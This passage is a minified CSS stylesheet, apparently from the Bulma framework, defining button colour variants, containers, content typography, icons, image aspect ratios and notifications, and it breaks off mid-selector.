.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-black.is-inverted.is-outlined.is-focused,.button.is-black.is-inverted.is-outlined.is-hovered,.button.is-black.is-inverted.is-outlined:focus,.button.is-black.is-inverted.is-outlined:hover{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-black.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-black.is-inverted.is-outlined.is-loading:focus::after,.button.is-black.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-light{background-color:#f5f5f5;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-hovered,.button.is-light:hover{background-color:#eee;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-focused,.button.is-light:focus{border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light.is-focused:not(:active),.button.is-light:focus:not(:active){box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.button.is-light.is-active,.button.is-light:active{background-color:#e8e8e8;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-light[disabled],fieldset[disabled] .button.is-light{background-color:#f5f5f5;border-color:transparent;box-shadow:none}.button.is-light.is-inverted{background-color:rgba(0,0,0,.7);color:#f5f5f5}.button.is-light.is-inverted.is-hovered,.button.is-light.is-inverted:hover{background-color:rgba(0,0,0,.7)}.button.is-light.is-inverted[disabled],fieldset[disabled] .button.is-light.is-inverted{background-color:rgba(0,0,0,.7);border-color:transparent;box-shadow:none;color:#f5f5f5}.button.is-light.is-loading::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;color:#f5f5f5}.button.is-light.is-outlined.is-focused,.button.is-light.is-outlined.is-hovered,.button.is-light.is-outlined:focus,.button.is-light.is-outlined:hover{background-color:#f5f5f5;border-color:#f5f5f5;color:rgba(0,0,0,.7)}.button.is-light.is-outlined.is-loading::after{border-color:transparent transparent #f5f5f5 #f5f5f5!important}.button.is-light.is-outlined.is-loading.is-focused::after,.button.is-light.is-outlined.is-loading.is-hovered::after,.button.is-light.is-outlined.is-loading:focus::after,.button.is-light.is-outlined.is-loading:hover::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined[disabled],fieldset[disabled] .button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;box-shadow:none;color:#f5f5f5}.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);color:rgba(0,0,0,.7)}.button.is-light.is-inverted.is-outlined.is-focused,.button.is-light.is-inverted.is-outlined.is-hovered,.button.is-light.is-inverted.is-outlined:focus,.button.is-light.is-inverted.is-outlined:hover{background-color:rgba(0,0,0,.7);color:#f5f5f5}.button.is-light.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-light.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-light.is-inverted.is-outlined.is-loading:focus::after,.button.is-light.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #f5f5f5 #f5f5f5!important}.button.is-light.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);box-shadow:none;color:rgba(0,0,0,.7)}.button.is-dark{background-color:#363636;border-color:transparent;color:#fff}.button.is-dark.is-hovered,.button.is-dark:hover{background-color:#2f2f2f;border-color:transparent;color:#fff}.button.is-dark.is-focused,.button.is-dark:focus{border-color:transparent;color:#fff}.button.is-dark.is-focused:not(:active),.button.is-dark:focus:not(:active){box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.button.is-dark.is-active,.button.is-dark:active{background-color:#292929;border-color:transparent;color:#fff}.button.is-dark[disabled],fieldset[disabled] .button.is-dark{background-color:#363636;border-color:transparent;box-shadow:none}.button.is-dark.is-inverted{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-hovered,.button.is-dark.is-inverted:hover{background-color:#f2f2f2}.button.is-dark.is-inverted[disabled],fieldset[disabled] .button.is-dark.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#363636}.button.is-dark.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;color:#363636}.button.is-dark.is-outlined.is-focused,.button.is-dark.is-outlined.is-hovered,.button.is-dark.is-outlined:focus,.button.is-dark.is-outlined:hover{background-color:#363636;border-color:#363636;color:#fff}.button.is-dark.is-outlined.is-loading::after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-outlined.is-loading.is-focused::after,.button.is-dark.is-outlined.is-loading.is-hovered::after,.button.is-dark.is-outlined.is-loading:focus::after,.button.is-dark.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-outlined{background-color:transparent;border-color:#363636;box-shadow:none;color:#363636}.button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-dark.is-inverted.is-outlined.is-focused,.button.is-dark.is-inverted.is-outlined.is-hovered,.button.is-dark.is-inverted.is-outlined:focus,.button.is-dark.is-inverted.is-outlined:hover{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-dark.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-dark.is-inverted.is-outlined.is-loading:focus::after,.button.is-dark.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary{background-color:#00d1b2;border-color:transparent;color:#fff}.button.is-primary.is-hovered,.button.is-primary:hover{background-color:#00c4a7;border-color:transparent;color:#fff}.button.is-primary.is-focused,.button.is-primary:focus{border-color:transparent;color:#fff}.button.is-primary.is-focused:not(:active),.button.is-primary:focus:not(:active){box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.button.is-primary.is-active,.button.is-primary:active{background-color:#00b89c;border-color:transparent;color:#fff}.button.is-primary[disabled],fieldset[disabled] .button.is-primary{background-color:#00d1b2;border-color:transparent;box-shadow:none}.button.is-primary.is-inverted{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-hovered,.button.is-primary.is-inverted:hover{background-color:#f2f2f2}.button.is-primary.is-inverted[disabled],fieldset[disabled] .button.is-primary.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#00d1b2}.button.is-primary.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;color:#00d1b2}.button.is-primary.is-outlined.is-focused,.button.is-primary.is-outlined.is-hovered,.button.is-primary.is-outlined:focus,.button.is-primary.is-outlined:hover{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.button.is-primary.is-outlined.is-loading::after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-outlined.is-loading.is-focused::after,.button.is-primary.is-outlined.is-loading.is-hovered::after,.button.is-primary.is-outlined.is-loading:focus::after,.button.is-primary.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;box-shadow:none;color:#00d1b2}.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-primary.is-inverted.is-outlined.is-focused,.button.is-primary.is-inverted.is-outlined.is-hovered,.button.is-primary.is-inverted.is-outlined:focus,.button.is-primary.is-inverted.is-outlined:hover{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-primary.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-primary.is-inverted.is-outlined.is-loading:focus::after,.button.is-primary.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary.is-light{background-color:#ebfffc;color:#00947e}.button.is-primary.is-light.is-hovered,.button.is-primary.is-light:hover{background-color:#defffa;border-color:transparent;color:#00947e}.button.is-primary.is-light.is-active,.button.is-primary.is-light:active{background-color:#d1fff8;border-color:transparent;color:#00947e}.button.is-link{background-color:#3273dc;border-color:transparent;color:#fff}.button.is-link.is-hovered,.button.is-link:hover{background-color:#276cda;border-color:transparent;color:#fff}.button.is-link.is-focused,.button.is-link:focus{border-color:transparent;color:#fff}.button.is-link.is-focused:not(:active),.button.is-link:focus:not(:active){box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.button.is-link.is-active,.button.is-link:active{background-color:#2366d1;border-color:transparent;color:#fff}.button.is-link[disabled],fieldset[disabled] .button.is-link{background-color:#3273dc;border-color:transparent;box-shadow:none}.button.is-link.is-inverted{background-color:#fff;color:#3273dc}.button.is-link.is-inverted.is-hovered,.button.is-link.is-inverted:hover{background-color:#f2f2f2}.button.is-link.is-inverted[disabled],fieldset[disabled] .button.is-link.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3273dc}.button.is-link.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined{background-color:transparent;border-color:#3273dc;color:#3273dc}.button.is-link.is-outlined.is-focused,.button.is-link.is-outlined.is-hovered,.button.is-link.is-outlined:focus,.button.is-link.is-outlined:hover{background-color:#3273dc;border-color:#3273dc;color:#fff}.button.is-link.is-outlined.is-loading::after{border-color:transparent transparent #3273dc #3273dc!important}.button.is-link.is-outlined.is-loading.is-focused::after,.button.is-link.is-outlined.is-loading.is-hovered::after,.button.is-link.is-outlined.is-loading:focus::after,.button.is-link.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined[disabled],fieldset[disabled] .button.is-link.is-outlined{background-color:transparent;border-color:#3273dc;box-shadow:none;color:#3273dc}.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-link.is-inverted.is-outlined.is-focused,.button.is-link.is-inverted.is-outlined.is-hovered,.button.is-link.is-inverted.is-outlined:focus,.button.is-link.is-inverted.is-outlined:hover{background-color:#fff;color:#3273dc}.button.is-link.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-link.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-link.is-inverted.is-outlined.is-loading:focus::after,.button.is-link.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #3273dc #3273dc!important}.button.is-link.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-link.is-light{background-color:#eef3fc;color:#2160c4}.button.is-link.is-light.is-hovered,.button.is-link.is-light:hover{background-color:#e3ecfa;border-color:transparent;color:#2160c4}.button.is-link.is-light.is-active,.button.is-link.is-light:active{background-color:#d8e4f8;border-color:transparent;color:#2160c4}.button.is-info{background-color:#3298dc;border-color:transparent;color:#fff}.button.is-info.is-hovered,.button.is-info:hover{background-color:#2793da;border-color:transparent;color:#fff}.button.is-info.is-focused,.button.is-info:focus{border-color:transparent;color:#fff}.button.is-info.is-focused:not(:active),.button.is-info:focus:not(:active){box-shadow:0 0 0 .125em rgba(50,152,220,.25)}.button.is-info.is-active,.button.is-info:active{background-color:#238cd1;border-color:transparent;color:#fff}.button.is-info[disabled],fieldset[disabled] .button.is-info{background-color:#3298dc;border-color:transparent;box-shadow:none}.button.is-info.is-inverted{background-color:#fff;color:#3298dc}.button.is-info.is-inverted.is-hovered,.button.is-info.is-inverted:hover{background-color:#f2f2f2}.button.is-info.is-inverted[disabled],fieldset[disabled] .button.is-info.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3298dc}.button.is-info.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined{background-color:transparent;border-color:#3298dc;color:#3298dc}.button.is-info.is-outlined.is-focused,.button.is-info.is-outlined.is-hovered,.button.is-info.is-outlined:focus,.button.is-info.is-outlined:hover{background-color:#3298dc;border-color:#3298dc;color:#fff}.button.is-info.is-outlined.is-loading::after{border-color:transparent transparent #3298dc #3298dc!important}.button.is-info.is-outlined.is-loading.is-focused::after,.button.is-info.is-outlined.is-loading.is-hovered::after,.button.is-info.is-outlined.is-loading:focus::after,.button.is-info.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined[disabled],fieldset[disabled] .button.is-info.is-outlined{background-color:transparent;border-color:#3298dc;box-shadow:none;color:#3298dc}.button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-info.is-inverted.is-outlined.is-focused,.button.is-info.is-inverted.is-outlined.is-hovered,.button.is-info.is-inverted.is-outlined:focus,.button.is-info.is-inverted.is-outlined:hover{background-color:#fff;color:#3298dc}.button.is-info.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-info.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-info.is-inverted.is-outlined.is-loading:focus::after,.button.is-info.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #3298dc #3298dc!important}.button.is-info.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-info.is-light{background-color:#eef6fc;color:#1d72aa}.button.is-info.is-light.is-hovered,.button.is-info.is-light:hover{background-color:#e3f1fa;border-color:transparent;color:#1d72aa}.button.is-info.is-light.is-active,.button.is-info.is-light:active{background-color:#d8ebf8;border-color:transparent;color:#1d72aa}.button.is-success{background-color:#48c774;border-color:transparent;color:#fff}.button.is-success.is-hovered,.button.is-success:hover{background-color:#3ec46d;border-color:transparent;color:#fff}.button.is-success.is-focused,.button.is-success:focus{border-color:transparent;color:#fff}.button.is-success.is-focused:not(:active),.button.is-success:focus:not(:active){box-shadow:0 0 0 .125em rgba(72,199,116,.25)}.button.is-success.is-active,.button.is-success:active{background-color:#3abb67;border-color:transparent;color:#fff}.button.is-success[disabled],fieldset[disabled] .button.is-success{background-color:#48c774;border-color:transparent;box-shadow:none}.button.is-success.is-inverted{background-color:#fff;color:#48c774}.button.is-success.is-inverted.is-hovered,.button.is-success.is-inverted:hover{background-color:#f2f2f2}.button.is-success.is-inverted[disabled],fieldset[disabled] .button.is-success.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#48c774}.button.is-success.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined{background-color:transparent;border-color:#48c774;color:#48c774}.button.is-success.is-outlined.is-focused,.button.is-success.is-outlined.is-hovered,.button.is-success.is-outlined:focus,.button.is-success.is-outlined:hover{background-color:#48c774;border-color:#48c774;color:#fff}.button.is-success.is-outlined.is-loading::after{border-color:transparent transparent #48c774 #48c774!important}.button.is-success.is-outlined.is-loading.is-focused::after,.button.is-success.is-outlined.is-loading.is-hovered::after,.button.is-success.is-outlined.is-loading:focus::after,.button.is-success.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined[disabled],fieldset[disabled] .button.is-success.is-outlined{background-color:transparent;border-color:#48c774;box-shadow:none;color:#48c774}.button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-success.is-inverted.is-outlined.is-focused,.button.is-success.is-inverted.is-outlined.is-hovered,.button.is-success.is-inverted.is-outlined:focus,.button.is-success.is-inverted.is-outlined:hover{background-color:#fff;color:#48c774}.button.is-success.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-success.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-success.is-inverted.is-outlined.is-loading:focus::after,.button.is-success.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #48c774 #48c774!important}.button.is-success.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-success.is-light{background-color:#effaf3;color:#257942}.button.is-success.is-light.is-hovered,.button.is-success.is-light:hover{background-color:#e6f7ec;border-color:transparent;color:#257942}.button.is-success.is-light.is-active,.button.is-success.is-light:active{background-color:#dcf4e4;border-color:transparent;color:#257942}.button.is-warning{background-color:#ffdd57;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-hovered,.button.is-warning:hover{background-color:#ffdb4a;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-focused,.button.is-warning:focus{border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-focused:not(:active),.button.is-warning:focus:not(:active){box-shadow:0 0 0 .125em rgba(255,221,87,.25)}.button.is-warning.is-active,.button.is-warning:active{background-color:#ffd83d;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning[disabled],fieldset[disabled] .button.is-warning{background-color:#ffdd57;border-color:transparent;box-shadow:none}.button.is-warning.is-inverted{background-color:rgba(0,0,0,.7);color:#ffdd57}.button.is-warning.is-inverted.is-hovered,.button.is-warning.is-inverted:hover{background-color:rgba(0,0,0,.7)}.button.is-warning.is-inverted[disabled],fieldset[disabled] .button.is-warning.is-inverted{background-color:rgba(0,0,0,.7);border-color:transparent;box-shadow:none;color:#ffdd57}.button.is-warning.is-loading::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined{background-color:transparent;border-color:#ffdd57;color:#ffdd57}.button.is-warning.is-outlined.is-focused,.button.is-warning.is-outlined.is-hovered,.button.is-warning.is-outlined:focus,.button.is-warning.is-outlined:hover{background-color:#ffdd57;border-color:#ffdd57;color:rgba(0,0,0,.7)}.button.is-warning.is-outlined.is-loading::after{border-color:transparent transparent #ffdd57 #ffdd57!important}.button.is-warning.is-outlined.is-loading.is-focused::after,.button.is-warning.is-outlined.is-loading.is-hovered::after,.button.is-warning.is-outlined.is-loading:focus::after,.button.is-warning.is-outlined.is-loading:hover::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-outlined{background-color:transparent;border-color:#ffdd57;box-shadow:none;color:#ffdd57}.button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);color:rgba(0,0,0,.7)}.button.is-warning.is-inverted.is-outlined.is-focused,.button.is-warning.is-inverted.is-outlined.is-hovered,.button.is-warning.is-inverted.is-outlined:focus,.button.is-warning.is-inverted.is-outlined:hover{background-color:rgba(0,0,0,.7);color:#ffdd57}.button.is-warning.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-warning.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-warning.is-inverted.is-outlined.is-loading:focus::after,.button.is-warning.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #ffdd57 #ffdd57!important}.button.is-warning.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);box-shadow:none;color:rgba(0,0,0,.7)}.button.is-warning.is-light{background-color:#fffbeb;color:#947600}.button.is-warning.is-light.is-hovered,.button.is-warning.is-light:hover{background-color:#fff8de;border-color:transparent;color:#947600}.button.is-warning.is-light.is-active,.button.is-warning.is-light:active{background-color:#fff6d1;border-color:transparent;color:#947600}.button.is-danger{background-color:#f14668;border-color:transparent;color:#fff}.button.is-danger.is-hovered,.button.is-danger:hover{background-color:#f03a5f;border-color:transparent;color:#fff}.button.is-danger.is-focused,.button.is-danger:focus{border-color:transparent;color:#fff}.button.is-danger.is-focused:not(:active),.button.is-danger:focus:not(:active){box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.button.is-danger.is-active,.button.is-danger:active{background-color:#ef2e55;border-color:transparent;color:#fff}.button.is-danger[disabled],fieldset[disabled] .button.is-danger{background-color:#f14668;border-color:transparent;box-shadow:none}.button.is-danger.is-inverted{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-hovered,.button.is-danger.is-inverted:hover{background-color:#f2f2f2}.button.is-danger.is-inverted[disabled],fieldset[disabled] .button.is-danger.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#f14668}.button.is-danger.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;color:#f14668}.button.is-danger.is-outlined.is-focused,.button.is-danger.is-outlined.is-hovered,.button.is-danger.is-outlined:focus,.button.is-danger.is-outlined:hover{background-color:#f14668;border-color:#f14668;color:#fff}.button.is-danger.is-outlined.is-loading::after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-outlined.is-loading.is-focused::after,.button.is-danger.is-outlined.is-loading.is-hovered::after,.button.is-danger.is-outlined.is-loading:focus::after,.button.is-danger.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;box-shadow:none;color:#f14668}.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-danger.is-inverted.is-outlined.is-focused,.button.is-danger.is-inverted.is-outlined.is-hovered,.button.is-danger.is-inverted.is-outlined:focus,.button.is-danger.is-inverted.is-outlined:hover{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-danger.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-danger.is-inverted.is-outlined.is-loading:focus::after,.button.is-danger.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.button.is-danger.is-light.is-hovered,.button.is-danger.is-light:hover{background-color:#fde0e6;border-color:transparent;color:#cc0f35}.button.is-danger.is-light.is-active,.button.is-danger.is-light:active{background-color:#fcd4dc;border-color:transparent;color:#cc0f35}.button.is-small{border-radius:2px;font-size:.75rem}.button.is-normal{font-size:1rem}.button.is-medium{font-size:1.25rem}.button.is-large{font-size:1.5rem}.button[disabled],fieldset[disabled] .button{background-color:#fff;border-color:#dbdbdb;box-shadow:none;opacity:.5}.button.is-fullwidth{display:flex;width:100%}.button.is-loading{color:transparent!important;pointer-events:none}.button.is-loading::after{position:absolute;left:calc(50% - (1em / 2));top:calc(50% - (1em / 2));position:absolute!important}.button.is-static{background-color:#f5f5f5;border-color:#dbdbdb;color:#7a7a7a;box-shadow:none;pointer-events:none}.button.is-rounded{border-radius:290486px;padding-left:calc(1em + .25em);padding-right:calc(1em + .25em)}.buttons{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.buttons .button{margin-bottom:.5rem}.buttons .button:not(:last-child):not(.is-fullwidth){margin-right:.5rem}.buttons:last-child{margin-bottom:-.5rem}.buttons:not(:last-child){margin-bottom:1rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large){border-radius:2px;font-size:.75rem}.buttons.are-medium .button:not(.is-small):not(.is-normal):not(.is-large){font-size:1.25rem}.buttons.are-large .button:not(.is-small):not(.is-normal):not(.is-medium){font-size:1.5rem}.buttons.has-addons .button:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.buttons.has-addons .button:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0;margin-right:-1px}.buttons.has-addons .button:last-child{margin-right:0}.buttons.has-addons .button.is-hovered,.buttons.has-addons .button:hover{z-index:2}.buttons.has-addons .button.is-active,.buttons.has-addons .button.is-focused,.buttons.has-addons .button.is-selected,.buttons.has-addons .button:active,.buttons.has-addons .button:focus{z-index:3}.buttons.has-addons .button.is-active:hover,.buttons.has-addons .button.is-focused:hover,.buttons.has-addons .button.is-selected:hover,.buttons.has-addons .button:active:hover,.buttons.has-addons .button:focus:hover{z-index:4}.buttons.has-addons .button.is-expanded{flex-grow:1;flex-shrink:1}.buttons.is-centered{justify-content:center}.buttons.is-centered:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.buttons.is-right{justify-content:flex-end}.buttons.is-right:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.container{flex-grow:1;margin:0 auto;position:relative;width:auto}.container.is-fluid{max-width:none;padding-left:32px;padding-right:32px;width:100%}@media screen and (min-width:1024px){.container{max-width:960px}}@media screen and (max-width:1215px){.container.is-widescreen{max-width:1152px}}@media screen and (max-width:1407px){.container.is-fullhd{max-width:1344px}}@media screen and (min-width:1216px){.container{max-width:1152px}}@media screen and (min-width:1408px){.container{max-width:1344px}}.content li+li{margin-top:.25em}.content blockquote:not(:last-child),.content dl:not(:last-child),.content ol:not(:last-child),.content p:not(:last-child),.content pre:not(:last-child),.content table:not(:last-child),.content ul:not(:last-child){margin-bottom:1em}.content h1,.content h2,.content h3,.content h4,.content h5,.content h6{color:#363636;font-weight:600;line-height:1.125}.content h1{font-size:2em;margin-bottom:.5em}.content h1:not(:first-child){margin-top:1em}.content h2{font-size:1.75em;margin-bottom:.5714em}.content h2:not(:first-child){margin-top:1.1428em}.content h3{font-size:1.5em;margin-bottom:.6666em}.content h3:not(:first-child){margin-top:1.3333em}.content h4{font-size:1.25em;margin-bottom:.8em}.content h5{font-size:1.125em;margin-bottom:.8888em}.content h6{font-size:1em;margin-bottom:1em}.content blockquote{background-color:#f5f5f5;border-left:5px solid #dbdbdb;padding:1.25em 1.5em}.content ol{list-style-position:outside;margin-left:2em;margin-top:1em}.content ol:not([type]){list-style-type:decimal}.content ol:not([type]).is-lower-alpha{list-style-type:lower-alpha}.content ol:not([type]).is-lower-roman{list-style-type:lower-roman}.content ol:not([type]).is-upper-alpha{list-style-type:upper-alpha}.content ol:not([type]).is-upper-roman{list-style-type:upper-roman}.content ul{list-style:disc outside;margin-left:2em;margin-top:1em}.content ul ul{list-style-type:circle;margin-top:.5em}.content ul ul ul{list-style-type:square}.content dd{margin-left:2em}.content figure{margin-left:2em;margin-right:2em;text-align:center}.content figure:not(:first-child){margin-top:2em}.content figure:not(:last-child){margin-bottom:2em}.content figure img{display:inline-block}.content figure figcaption{font-style:italic}.content pre{-webkit-overflow-scrolling:touch;overflow-x:auto;padding:1.25em 1.5em;white-space:pre;word-wrap:normal}.content sub,.content sup{font-size:75%}.content table{width:100%}.content table td,.content table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.content table th{color:#363636}.content table th:not([align]){text-align:left}.content table thead td,.content table thead th{border-width:0 0 2px;color:#363636}.content table tfoot td,.content table tfoot th{border-width:2px 0 0;color:#363636}.content table tbody tr:last-child td,.content table tbody tr:last-child th{border-bottom-width:0}.content .tabs li+li{margin-top:0}.content.is-small{font-size:.75rem}.content.is-medium{font-size:1.25rem}.content.is-large{font-size:1.5rem}.icon{align-items:center;display:inline-flex;justify-content:center;height:1.5rem;width:1.5rem}.icon.is-small{height:1rem;width:1rem}.icon.is-medium{height:2rem;width:2rem}.icon.is-large{height:3rem;width:3rem}.image{display:block;position:relative}.image img{display:block;height:auto;width:100%}.image img.is-rounded{border-radius:290486px}.image.is-fullwidth{width:100%}.image.is-16by9 .has-ratio,.image.is-16by9 img,.image.is-1by1 .has-ratio,.image.is-1by1 img,.image.is-1by2 .has-ratio,.image.is-1by2 img,.image.is-1by3 .has-ratio,.image.is-1by3 img,.image.is-2by1 .has-ratio,.image.is-2by1 img,.image.is-2by3 .has-ratio,.image.is-2by3 img,.image.is-3by1 .has-ratio,.image.is-3by1 img,.image.is-3by2 .has-ratio,.image.is-3by2 img,.image.is-3by4 .has-ratio,.image.is-3by4 img,.image.is-3by5 .has-ratio,.image.is-3by5 img,.image.is-4by3 .has-ratio,.image.is-4by3 img,.image.is-4by5 .has-ratio,.image.is-4by5 img,.image.is-5by3 .has-ratio,.image.is-5by3 img,.image.is-5by4 .has-ratio,.image.is-5by4 img,.image.is-9by16 .has-ratio,.image.is-9by16 img,.image.is-square .has-ratio,.image.is-square img{height:100%;width:100%}.image.is-1by1,.image.is-square{padding-top:100%}.image.is-5by4{padding-top:80%}.image.is-4by3{padding-top:75%}.image.is-3by2{padding-top:66.6666%}.image.is-5by3{padding-top:60%}.image.is-16by9{padding-top:56.25%}.image.is-2by1{padding-top:50%}.image.is-3by1{padding-top:33.3333%}.image.is-4by5{padding-top:125%}.image.is-3by4{padding-top:133.3333%}.image.is-2by3{padding-top:150%}.image.is-3by5{padding-top:166.6666%}.image.is-9by16{padding-top:177.7777%}.image.is-1by2{padding-top:200%}.image.is-1by3{padding-top:300%}.image.is-16x16{height:16px;width:16px}.image.is-24x24{height:24px;width:24px}.image.is-32x32{height:32px;width:32px}.image.is-48x48{height:48px;width:48px}.image.is-64x64{height:64px;width:64px}.image.is-96x96{height:96px;width:96px}.image.is-128x128{height:128px;width:128px}.notification{background-color:#f5f5f5;border-radius:4px;padding:1.25rem 2.5rem 1.25rem 1.5rem;position:relative}.notification a:not(.button):not(.dropdown-item){color:currentColor;text-decoration:underline}.notification strong{color:currentColor}.notification code,.notification pre{background:#fff}.notification pre code{background:0 0}.notification>.delete{position:absolute;right:.5rem;top:.5rem}.notification .content,.notification .subtitle,.notification 